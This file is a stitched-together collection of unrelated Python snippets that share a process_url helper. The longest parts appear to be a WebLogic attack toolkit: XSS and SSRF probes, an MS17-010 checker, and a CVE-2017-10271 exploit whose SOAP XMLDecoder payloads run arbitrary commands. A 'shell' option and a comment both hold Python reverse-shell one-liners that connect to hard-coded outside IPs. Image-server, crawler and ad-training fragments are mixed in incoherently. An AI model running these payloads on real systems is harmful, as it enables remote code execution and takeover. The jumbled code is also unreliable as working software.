def detect_uddi_xss(url):
    """Check /uddiexplorer/SetupUDDIExplorer.jsp for reflected XSS via the
    privateinquiryurls cookie."""
    headers = {
        'Host': '127.0.0.1:80',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
        'Upgrade-Insecure-Requests': '1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6,zh-TW;q=0.5',
        # The XSS probe is injected through the privateinquiryurls cookie.
        'Cookie': 'publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; JSESSIONID=h0Vd0MghcMhQ2XG5MkQnGgylJPlymlnpqJJn2T0ryvL3PL04tv1w!1520773416',
        'Connection': 'close',
    }
    try:
        (host, port) = utils.process_url(url)
        targeturl = "http://" + host + ":" + str(port) + '/uddiexplorer/SetupUDDIExplorer.jsp'
        logging.info(targeturl)
        req = urllib2.Request(targeturl, headers=headers)
        r = urllib2.urlopen(req, timeout=5)
        if '<script>alert(2)</script>' in r.read():
            print "[+] uddiexplorer Reflected XSS FOUND!!", url
            return 1
        else:
            print "[-] uddiexplorer Reflected XSS NOT FOUND", url
            return 0
    except Exception, e:
        print e
        return 0
def t3_enabled(url):
    """Probe whether the WebLogic T3 protocol is enabled on the target."""
    try:
        (host, port) = utils.process_url(url)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_address = (host, port)
        sock.settimeout(10)
        sock.connect(server_address)
        # T3 protocol handshake header
        headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
        sock.sendall(headers)
        data = sock.recv(1024)
        sock.close()  # was unreachable after the returns below; close before returning
        if not data.startswith('HELO'):
            print 't3_send exception: receive HELO fail!'
            return 0
        print "T3 connection success"
        return 1
    except Exception, e:
        print "t3_send exception:%s" % e
        return 0
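# NOTE: the scanners in this collection unpack
# "(host, port) = utils.process_url(url)", but the helper itself is not
# included here. Below is a minimal hypothetical sketch of what it presumably
# does; the function body, the default_port value (WebLogic's usual 7001),
# and the bare-host handling are assumptions, not the project's actual code.
import urlparse


def process_url(url, default_port=7001):
    """Parse a URL or bare host[:port] string into a (host, port) tuple."""
    if '://' not in url:
        url = 'http://' + url  # urlparse needs a scheme to find the netloc
    parsed = urlparse.urlparse(url)
    return (parsed.hostname, parsed.port or default_port)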
def handle_request():
    server = os.environ["SERVER_NAME"].split(":")[0]
    path = os.environ["REQUEST_URI"]
    # Acquire lockfile
    lock = '/tmp/%s' % sha_constructor(path).hexdigest()
    if os.path.isfile(lock):
        doRedirect(path)
        return
    with lock_file(lock):
        if DEBUG:
            import cgitb
            cgitb.enable()
        try:
            url_parts = process_url(path, server)
        except Http404, e:
            do404(e.message, DEBUG)
            return
        new_file = Transmogrify(url_parts['original_file'], url_parts['actions'])
        new_file.save()
    doRedirect(path)
def send_payload(url, payload, sig, name):
    # Example reverse-shell payload body, kept for reference:
    # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.93.41.180",55555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
    headers = {
        'Host': '127.0.0.1:7001',
        'Content-Type': 'text/xml',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
    }
    # Earlier Windows variant, kept for reference:
    # r = requests.post(url, headers=headers, data=payload_windows)
    # if r.status_code == 500 and evidence in r.text:
    #     print "[!!windows]", url
    try:
        (host, port) = utils.process_url(url)
        headers['Host'] = ''.join([host, ':', str(port)])
        r1 = requests.post(url, headers=headers, data=payload, timeout=3)
        # A 500 response whose body matches the signature means the payload
        # was deserialized server-side.
        if r1.status_code == 500 and re.search(sig, r1.text):
            print r1.text
            print "[+]", url, "-", name
            return 1
        else:
            return 0
    except Exception as e:
        return 0
def testAliases(self):
    import utils
    utils.PATH_ALIASES = {'/media/': '/testdata/'}
    utils.BASE_PATH = os.path.abspath(os.path.dirname(__file__))
    url = "/media/horiz_img_r200.jpg"
    url += "?%s" % self.doShaHash('_r200')
    result = utils.process_url(url)
    self.assertEquals(result['original_file'],
                      os.path.join(utils.BASE_PATH, 'testdata', 'horiz_img.jpg'))
def handle_request():
    if DEBUG:
        import cgitb
        cgitb.enable()
    try:
        server = os.environ["SERVER_NAME"].split(":")[0]
        url_parts = process_url(os.environ['REQUEST_URI'], server)
    except Http404, e:
        do404(e.message, DEBUG)
def test_aliases(self):
    import utils
    import os
    os.environ["TRANSMOGRIFY_PATH_ALIASES"] = "/media/,/testdata/"
    utils.PATH_ALIASES = {"/media/": "/testdata/"}
    url = "/media/horiz_img_r200.jpg"
    url += "?%s" % self.do_sha_hash("_r200")
    result = utils.process_url(url, document_root=HERE)
    self.assertEquals(result["original_file"], get_test_filepath("horiz_img.jpg"))
def transmogrify_serve(request, path, document_root=None, show_indexes=False):
    if HEXDIGEST_RE.match(request.META['QUERY_STRING']):
        try:
            request_uri = "%s?%s" % (path, request.META['QUERY_STRING'])
            server = request.META["SERVER_NAME"].split(":")[0]
            url_parts = utils.process_url(request_uri, server, document_root)
            if not os.path.exists(url_parts['requested_file']):
                new_file = Transmogrify(url_parts['original_file'], url_parts['actions'])
                new_file.save()
        except utils.Http404, e:
            raise Http404(e)
def app(environ, start_response):
    from settings import DEBUG
    cropname = None
    server = environ['SERVER_NAME']
    quality = 80
    request_uri = get_path(environ)
    path_and_query = request_uri.lstrip('/')
    if path_and_query == "":  # 'is ""' compared identity, not equality
        return do_404(environ, start_response, "Not Found", DEBUG)
    if environ.get('REQUEST_METHOD', 'GET') == 'PURGE':
        return handle_purge(environ, start_response)
    # Acquire lockfile
    lock = '/tmp/%s' % sha1(path_and_query).hexdigest()
    if os.path.isfile(lock):
        return do_redirect(environ, start_response, request_uri)
    with lock_file(lock):
        try:
            url_parts = process_url(path_and_query, server)
            output_path, _ = os.path.split(url_parts['requested_file'])
            makedirs(output_path)
            if not os.path.exists(url_parts['original_file']):
                raise Http404
            if not os.path.isfile(url_parts['original_file']):
                raise Http404
        except Http404 as e:
            return do_404(environ, start_response, e.message, DEBUG)
        new_file = Transmogrify(
            url_parts['original_file'],
            url_parts['actions'],
            quality=quality,
            output_path=output_path
        )
        new_file.cropname = cropname
        new_file.save()
        if cropname:
            # Rewrite the request_uri to use the new file with the cropname.
            urlbits = list(urlparse.urlsplit(request_uri))
            output_filename = new_file.get_processed_filename()
            filename = os.path.basename(output_filename)
            requested_dir = os.path.dirname(urlbits[2])
            urlbits[2] = os.path.join(requested_dir, filename)
            request_uri = urlparse.urlunsplit(urlbits)
        return do_redirect(environ, start_response, request_uri)
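# NOTE: the transmogrify handlers and tests above call a second,
# dict-returning process_url, distinct from the (host, port) helper used by
# the scanners. Its real implementation is not in this collection; the sketch
# below is hypothetical but consistent with the tests (action codes appended
# before the extension, PATH_ALIASES substitution, a SHA-1 security hash in
# the query string). ACTION_RE, SECRET_KEY, and the exact hash scheme are
# assumptions.
import hashlib
import os
import re
import urlparse

SECRET_KEY = 'changeme'                 # shared secret (assumed)
BASE_PATH = '/var/www'                  # filesystem root (assumed)
PATH_ALIASES = {}                       # e.g. {'/media/': '/testdata/'}
ACTION_RE = re.compile(r'_[a-z]+\d+')   # e.g. "_r200" = resize to 200px


class Http404(Exception):
    pass


def process_url(path_and_query, server=None, document_root=None):
    """Split '/media/horiz_img_r200.jpg?<sha1>' into original file,
    requested file, and the list of action codes."""
    parsed = urlparse.urlparse(path_and_query)
    path, query = parsed.path, parsed.query
    for alias, real in PATH_ALIASES.items():
        if path.startswith(alias):
            path = real + path[len(alias):]
            break
    base, ext = os.path.splitext(path)
    actions = ACTION_RE.findall(base)
    # The query string must be the SHA-1 of the action suffix plus the shared
    # secret, so clients cannot request arbitrary transformations.
    if query != hashlib.sha1(''.join(actions) + SECRET_KEY).hexdigest():
        raise Http404("Invalid security hash")
    root = document_root or BASE_PATH
    return {
        'original_file': os.path.join(root, ACTION_RE.sub('', base).lstrip('/') + ext),
        'requested_file': os.path.join(root, path.lstrip('/')),
        'actions': actions,
    }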
def handle_request():
    # Acquire lockfile
    lock = '/tmp/%s' % sha1(os.environ["REQUEST_URI"]).hexdigest()
    if os.path.isfile(lock):
        print "Location: %s" % os.environ["REQUEST_URI"]
        print
        return
    open(lock, 'w')
    if DEBUG:
        import cgitb
        cgitb.enable()
    try:
        server = os.environ["SERVER_NAME"].split(":")[0]
        url_parts = process_url(os.environ['REQUEST_URI'], server)
    except Http404, e:
        do404(e.message, DEBUG)
def handle_request():
    # Acquire lockfile
    lock = '/tmp/%s' % sha_constructor(os.environ["REQUEST_URI"]).hexdigest()
    if os.path.isfile(lock):
        print "Location: %s" % os.environ["REQUEST_URI"]
        print
        return
    open(lock, 'w')
    if DEBUG:
        import cgitb
        cgitb.enable()
    try:
        server = os.environ["SERVER_NAME"].split(":")[0]
        url_parts = process_url(os.environ['REQUEST_URI'], server)
    except Http404, e:
        do404(e.message, DEBUG)
def run(url, payload, sig, vul):
    try:
        (host, port) = utils.process_url(url)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(15)
        t3handshake(sock, (host, port))
        buildT3RequestObject(sock, port)
        rs = sendEvilObjData(sock, payload)
        sock.close()
        p = re.findall(sig, rs, re.S)
        if len(p) > 0:
            print '%s:%d is vul %s' % (host, port, vul)
            return 1
        else:
            print '%s:%d is not vul %s' % (host, port, vul)
            return 0
    except Exception, e:
        print e
        return 0
def detect_ssrf(url):
    """Check the WebLogic uddiexplorer SearchPublicRegistries.jsp for SSRF."""
    try:
        logging.info("url is %s", url)
        (host, port) = utils.process_url(url)
        targeturl = "http://" + host + ":" + str(port) + "/uddiexplorer/SearchPublicRegistries.jsp"
        logging.info("targeturl is %s", targeturl)
        urllib2.urlopen(targeturl, timeout=20)
        # Point the 'operator' parameter back at the server itself; the error
        # message reveals whether the backend actually made the request.
        payload = ("?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor="
                   "&selfor=Business+location&btnSubmit=Search"
                   "&operator=http://127.0.0.1:{}".format(port))
        r = urllib2.urlopen(targeturl + payload, timeout=20).read()
        if ("Operation timed out" in r or "Socket Closed" in r
                or "Received a response from url" in r
                or "Connection reset by peer" in r):
            print "[+] uddiexplorer ssrf FOUND!"
            return 1
        else:
            print "[-] uddiexplorer ssrf NOT FOUND"
            return 0
    except Exception, e:
        print e
        return 0
def do_jobs(self):
    self.get_jobs(self.args.jobs or 2)
    time_before_yield = 0.0
    for tasks in self.yield_tasks():
        if time_before_yield != 0.0:
            self.print_queue.put("got yield tasks, took %f seconds" % (time.time() - time_before_yield))
        time_before_get = time.time()
        get_requests = dict([(grequests.get(task, timeout=5), task) for task in tasks])
        grequests.map(get_requests.keys(), stream=True)
        self.print_queue.put("got responses, took %f seconds" % (time.time() - time_before_get))
        found_count = 0.0
        get_successful = []
        get_failed = []
        get_wrong_type = []
        get_responses = {}
        time_before_process = time.time()
        # Triage responses: failures, non-text content, and candidates.
        for request in list(get_requests):
            original_url = get_requests[request].split("://", 1)[-1]
            response = request.response
            if not response or not response.status_code < 400:
                get_failed.append(original_url)
            elif not response.headers.get("content-type", "").startswith("text/"):
                get_wrong_type.append(original_url)
            else:
                get_responses[response] = original_url
        self.print_queue.put("finished processing, took %f seconds" % (time.time() - time_before_process))
        time_before_responses = time.time()
        # Force-read the response bodies concurrently.
        gevent.joinall([gevent.spawn(getattr, response, "text")
                        for response in get_responses])
        self.print_queue.put("got second responses, took %f seconds" % (time.time() - time_before_responses))
        time_before_second_process = time.time()
        for response in list(get_responses):
            original_url = get_responses[response]
            try:
                text = response.text
            except Exception:  # was a bare except
                get_failed.append(original_url)
                continue
            if not text:
                get_failed.append(original_url)
            else:
                actual_url = response.url
                get_successful.append(original_url)
                found_urls = utils.find_urls(response.text, actual_url)
                found_count += len(found_urls)
                for url in found_urls:
                    url_parts = utils.process_url(url)
                    if url_parts:
                        self.statsd_counter.increment("url_found")
                        self.insert_queue.put(url_parts)
        self.print_queue.put("finished second processing, took %f seconds" % (time.time() - time_before_second_process))
        time_taken = time.time() - time_before_get
        stats = "tried %d" % len(tasks)
        stats += ", success %d" % len(get_successful)
        stats += ", fail %d" % len(get_failed)
        stats += ", wrong %d" % len(get_wrong_type)
        stats += ", took %f seconds" % time_taken
        if get_successful:
            stats += ", found %d" % found_count
            stats += ", %f/site" % (found_count / len(get_successful))
            stats += ", %f/second" % (found_count / time_taken)
        self.print_queue.put(stats)
        for url in get_successful:
            self.database.timestamp(url)
        for url in get_failed:
            self.database.timestamp(url, 1)
        for url in get_wrong_type:
            self.database.timestamp(url, 2)
        time_before_join = time.time()
        self.insert_queue.join()
        self.print_queue.put("finished insert queue join, took %f seconds" % (time.time() - time_before_join))
        time_before_yield = time.time()
# Label vocabularies observed in the corpus:
#   ad-copy judgments: Perfect, Excellent, Good, Fair, Bad, Very Bad / VeryBad,
#     Detrimental, NoJudgment:0, NoJudgment:Foreign / NJ:Foreign,
#     NoJudgment:Login / NJ:Login, NoJudgment:PageDidNotLoad / NJ:PageDidNotLoad
#   landing-page judgments: same, overlap, subset, superset, disjoint
with open(corpus_file, 'r', encoding='utf-8') as f:
    header = next(f)
    print('header is {}.'.format(header))
    for line in f:
        arr = line.strip('\n').split('\t')
        ac_label = arr[0].strip()
        lp_label = arr[1].strip()
        adCopyJudgment_set.add(ac_label)
        adLpJudgment_set.add(lp_label)
        query = utils.preprocess(arr[2].strip())
        query_set.add(query)
        keyword = utils.preprocess(arr[3])
        adText = utils.preprocess(arr[4])
        adTitle = utils.preprocess(arr[5])
        ad_url = utils.process_url(arr[6])
        lp_title = utils.preprocess(arr[7])
        # Only well-judged ads contribute co-occurrence training pairs.
        if ac_label in ('Perfect', 'Excellent', 'Good'):
            ac_training_file_f.write('{} {}\n'.format(query, adText))
            ac_training_file_f.write('{} {}\n'.format(query, adTitle))
            ac_training_file_f.write('{} {}\n'.format(query, keyword))
            ac_training_file_f.write('{} {}\n'.format(adText, keyword))
            ac_training_file_f.write('{} {}\n'.format(adTitle, keyword))
            ac_training_file_f.write('{} {}\n'.format(adTitle, adText))
            ac_training_file_f.write('{} {}\n'.format(query, ad_url))
            ac_training_file_f.write('{} {}\n'.format(keyword, ad_url))
            ac_training_file_f.write('{} {}\n'.format(adTitle, ad_url))
            ac_training_file_f.write('{} {}\n'.format(adText, ad_url))
            ac_cnt += 10
        all_ac_cnt += 1
        all_ad_copy_training_file_f.write('{} {} {} {} {}\n'.format(
            query, ad_url, keyword, adTitle, adText))
def check(url, port=445):
    """Check if the MS17-010 SMB vulnerability exists."""
    client = None
    ip = None
    try:
        (ip, _) = utils.process_url(url)
        buffersize = 1024
        timeout = 5.0
        # Send SMB requests over a raw socket.
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client.settimeout(timeout)
        client.connect((ip, port))
        # SMB - Negotiate Protocol Request
        client.send(negotiate_proto_request())
        tcp_response = client.recv(buffersize)
        # SMB - Session Setup AndX Request
        client.send(session_setup_andx_request())
        tcp_response = client.recv(buffersize)
        netbios = tcp_response[:4]
        smb_header = tcp_response[4:36]  # SMB header: 32 bytes
        smb = SMB_HEADER(smb_header)
        user_id = struct.pack('<H', smb.user_id)
        # Parse native_os from the Session Setup AndX response.
        session_setup_andx_response = tcp_response[36:]
        native_os = session_setup_andx_response[9:].split('\x00')[0]
        # SMB - Tree Connect AndX Request
        client.send(tree_connect_andx_request(ip, user_id))
        tcp_response = client.recv(buffersize)
        netbios = tcp_response[:4]
        smb_header = tcp_response[4:36]
        smb = SMB_HEADER(smb_header)
        tree_id = struct.pack('<H', smb.tree_id)
        process_id = struct.pack('<H', smb.process_id)
        user_id = struct.pack('<H', smb.user_id)
        multiplex_id = struct.pack('<H', smb.multiplex_id)
        # SMB - PeekNamedPipe Request
        client.send(peeknamedpipe_request(tree_id, process_id, user_id, multiplex_id))
        tcp_response = client.recv(buffersize)
        netbios = tcp_response[:4]
        smb_header = tcp_response[4:36]
        smb = SMB_HEADER(smb_header)
        nt_status = struct.pack('BBH', smb.error_class, smb.reserved1, smb.error_code)
        # 0xC0000205 - STATUS_INSUFF_SERVER_RESOURCES - vulnerable
        # 0xC0000008 - STATUS_INVALID_HANDLE
        # 0xC0000022 - STATUS_ACCESS_DENIED
        if nt_status == '\x05\x02\x00\xc0':
            log.info("[+] [{}] is likely VULNERABLE to MS17-010! ({})".format(ip, native_os))
            # Vulnerable to MS17-010; also check for DoublePulsar infection.
            client.send(trans2_request(tree_id, process_id, user_id, multiplex_id))
            tcp_response = client.recv(buffersize)
            netbios = tcp_response[:4]
            smb_header = tcp_response[4:36]
            smb = SMB_HEADER(smb_header)
            if smb.multiplex_id == 0x0051:
                key = calculate_doublepulsar_xor_key(smb.signature)
                log.info("Host is likely INFECTED with DoublePulsar! - XOR Key: {}".format(key))
            return 1
        elif nt_status in ('\x08\x00\x00\xc0', '\x22\x00\x00\xc0'):
            log.info("[-] [{}] does NOT appear vulnerable".format(ip))
            return 0
        else:
            log.info("[-] [{}] Unable to detect if this host is vulnerable".format(ip))
            return 0
    except Exception as err:
        log.error("[-] [{}] Exception: {}".format(ip, err))
        return 0
    finally:
        if client is not None:  # client may never have been created
            client.close()
def app(environ, start_response):
    cropname = None
    server = environ['SERVER_NAME']
    quality = 80
    if "path=" in environ.get("QUERY_STRING", ""):
        # I should probably require a POST for this, but meh, let's not
        # rock the boat.
        # transmogrify is being used directly and not as a 404 handler
        query_dict = urlparse.parse_qs(environ['QUERY_STRING'])
        path = query_dict.get("path", [""])[0]
        key = query_dict.get("key", [""])[0]
        # Validate the query params.
        if not (path and key):
            # The required parameters were not given
            start_response("400 Bad Response", [("Content-Type", "text/plain")])
            return ["path and key are required query parameters"]
        cropname = query_dict.get("cropname", [None])[0]
        quality = 100
        # Rewrite the environ to look like a 404 handler.
        environ['REQUEST_URI'] = path + "?" + key
    request_uri = environ['REQUEST_URI']
    path_and_query = request_uri.lstrip("/")
    requested_path = urlparse.urlparse(path_and_query).path
    if path_and_query == "":  # 'is ""' compared identity, not equality
        return do404(environ, start_response, "Not Found", DEBUG)
    # Acquire lockfile
    lock = '/tmp/%s' % sha_constructor(path_and_query).hexdigest()
    if os.path.isfile(lock):
        return doRedirect(environ, start_response, request_uri)
    with lock_file(lock):
        if FALLBACK_SERVERS:
            result = do_fallback(FALLBACK_SERVERS, BASE_PATH, requested_path)
            if result == (False, "bad path"):
                start_response("403 Forbidden", [])
                return []
        try:
            url_parts = process_url(path_and_query, server)
        except Http404, e:
            return do404(environ, start_response, e.message, DEBUG)
        new_file = Transmogrify(
            url_parts['original_file'],
            url_parts['actions'],
            quality=quality
        )
        new_file.cropname = cropname
        new_file.save()
        if cropname:
            # Rewrite the request_uri to use the new file with the cropname.
            urlbits = list(urlparse.urlsplit(request_uri))
            output_filename = new_file.get_processed_filename()
            filename = os.path.basename(output_filename)
            requested_dir = os.path.dirname(urlbits[2])
            urlbits[2] = os.path.join(requested_dir, filename)
            request_uri = urlparse.urlunsplit(urlbits)
        return doRedirect(environ, start_response, request_uri)
ad_copy_training_file = "data\\glove\\glove_adcopy_click_training_v3.txt"
all_ad_copy_training_file = "data\\glove\\all_glove_adcopy_click_training_v3.txt"
query_file = "data\\glove\\glove_query_set_v3.txt"

query_set = set()
ac_training_file_f = open(ad_copy_training_file, 'w', encoding='utf-8')
all_ac_training_file_f = open(all_ad_copy_training_file, 'w', encoding='utf-8')
query_file_f = open(query_file, 'w', encoding='utf-8')
ac_cnt = 0

with open(click_corpus_file, 'r', encoding='utf-8') as f:
    for line in f:
        arr = line.strip('\n').split('\t')
        ac_label = int(arr[12].strip())
        ad_url = utils.process_url(arr[14])
        adText = utils.preprocess(arr[15])
        adTitle = utils.preprocess(arr[16])
        keyword = utils.preprocess(arr[17]).strip()
        query = utils.preprocess(arr[18]).strip()
        query_set.add(query)
        print('{} : {} : {} : {} : {} : {}, url: {}'.format(
            ac_label, ad_url, adText, adTitle, keyword, query, ad_url))
        # Only clicks with a label above 2 contribute training pairs.
        if ac_label > 2:
            ac_training_file_f.write('{} {}\n'.format(query, adText))
            ac_training_file_f.write('{} {}\n'.format(query, adTitle))
            ac_training_file_f.write('{} {}\n'.format(query, keyword))
            ac_training_file_f.write('{} {}\n'.format(adText, keyword))
            ac_training_file_f.write('{} {}\n'.format(adTitle, keyword))
            ac_training_file_f.write('{} {}\n'.format(adTitle, adText))
def main():
    parser = optparse.OptionParser()
    parser.add_option('-H', dest='tgtHost', type="string", help='specify target host')
    parser.add_option('-p', dest='tgtPort', type='int', help="specify target port")
    parser.add_option('-b', action="store_true", dest='batch', default=False,
                      help="do a batch scan obtaining url list from remote server")
    parser.add_option('--time-based', action="store_true", dest='time_base',
                      help="time based", default=False)
    parser.add_option('-c', dest='command', help='command to execute')
    parser.add_option('-f', dest='filepath', help='file to load')
    parser.add_option('-O', dest='os', help='choose OS')
    parser.add_option('--create-file', action="store_true", dest='create_file',
                      help="create file using native java", default=False)
    (options, args) = parser.parse_args()

    tgtHost = options.tgtHost
    tgtPort = options.tgtPort
    batch = options.batch
    time_base = options.time_base
    command = options.command
    filepath = options.filepath
    os = options.os  # note: shadows the os module inside main()
    create_file = options.create_file

    if batch and time_base and not tgtHost and not tgtPort and not command and not create_file:
        urllist = utils.get_url_list(
            "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do")
        if urllist:
            target_host_port = map(utils.process_url, urllist)
            pool = ThreadPool(50)
            final_results_10271 = pool.map(cve_2017_10271_time_based, target_host_port)
            pool.close()
            pool.join()
            json_data_10271 = utils.assembly_data(
                "030103", dict(zip(urllist, final_results_10271)))
            print utils.post_data(
                json_data_10271,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do")
    elif batch and tgtHost is None and tgtPort is None and not time_base and not command and not create_file:
        urllist = utils.get_url_list(
            "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do")
        # The URL list is expected to hold bare host[:port] entries.
        assert 'https://' not in urllist
        assert 'http://' not in urllist
        assert 'http' not in urllist
        assert 'https' not in urllist
        if urllist:
            target_url_list1 = map(
                lambda url: 'http://' + utils.process_url(url)[0] + ":" +
                str(utils.process_url(url)[1]) + '/wls-wsat/CoordinatorPortType',
                urllist)
            target_url_list2 = map(
                lambda url: 'http://' + utils.process_url(url)[0] + ":" +
                str(utils.process_url(url)[1]) + '/wls-wsat/CoordinatorPortType11',
                urllist)
            pool = ThreadPool(50)
            results1_10271 = pool.map(cve_2017_10271, target_url_list1)
            results2_10271 = pool.map(cve_2017_10271, target_url_list2)
            results1_10352 = pool.map(cve_2017_10352, target_url_list1)
            results2_10352 = pool.map(cve_2017_10352, target_url_list2)
            pool.close()
            pool.join()
            # A host is vulnerable if either endpoint variant responds.
            final_results_10271 = [x or y for x, y in zip(results1_10271, results2_10271)]
            json_data_10271 = utils.assembly_data(
                "030103", dict(zip(urllist, final_results_10271)))
            final_results_10352 = [x or y for x, y in zip(results1_10352, results2_10352)]
            json_data_10352 = utils.assembly_data(
                "030111", dict(zip(urllist, final_results_10352)))
            print utils.post_data(
                json_data_10271,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do")
            print utils.post_data(
                json_data_10352,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do")
    elif tgtHost and tgtPort and not batch and not time_base and not command and not create_file:
        url1 = "http://" + tgtHost + ":" + str(tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(tgtPort) + '/wls-wsat/CoordinatorPortType11'
        cve_2017_10271(url1)
        cve_2017_10271(url2)
        cve_2017_10352(url1)
        cve_2017_10352(url2)
    elif tgtHost and tgtPort and time_base and not batch and not command and not create_file:
        cve_2017_10271_time_based((tgtHost, tgtPort))
    elif tgtHost and tgtPort and not time_base and not batch and not command and create_file:
        url1 = "http://" + tgtHost + ":" + str(tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(tgtPort) + '/wls-wsat/CoordinatorPortType11'
        send_payload(url1, payload_create_file_10271, sig_10271, "cve_2017_10271")
        send_payload(url2, payload_create_file_10271, sig_10271, "cve_2017_10271")
    elif tgtHost and tgtPort and not time_base and not batch and command and os:
        payload_linux_10271 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>{}</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''
        payload_windows_10271 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>C:\Windows\System32\cmd.exe</string></void>
            <void index="1"><string>/c</string></void>
            <void index="2"><string>{}</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''
        url1 = "http://" + tgtHost + ":" + str(tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(tgtPort) + '/wls-wsat/CoordinatorPortType11'
        if os == 'linux':
            if command == 'shell':
                command = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("144.202.87.92",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' '''
            print payload_linux_10271.format(command)
            send_payload(url1, payload_linux_10271.format(command), sig_10271, "cve_2017_10271")
            send_payload(url2, payload_linux_10271.format(command), sig_10271, "cve_2017_10271")
        elif os == 'win':
            print payload_windows_10271.format(command)
            send_payload(url1, payload_windows_10271.format(command), sig_10271, "cve_2017_10271")
            send_payload(url2, payload_windows_10271.format(command), sig_10271, "cve_2017_10271")
    elif not tgtHost and not tgtPort and filepath and not command and not batch and not time_base:
        with open(filepath, 'r') as f:
            u_list = f.readlines()
        for i in u_list:
            url = "http://" + i.strip() + '/wls-wsat/CoordinatorPortType'
            cve_2017_10271(url)
            cve_2017_10352(url)
    else:
        parser.print_help()
        exit(0)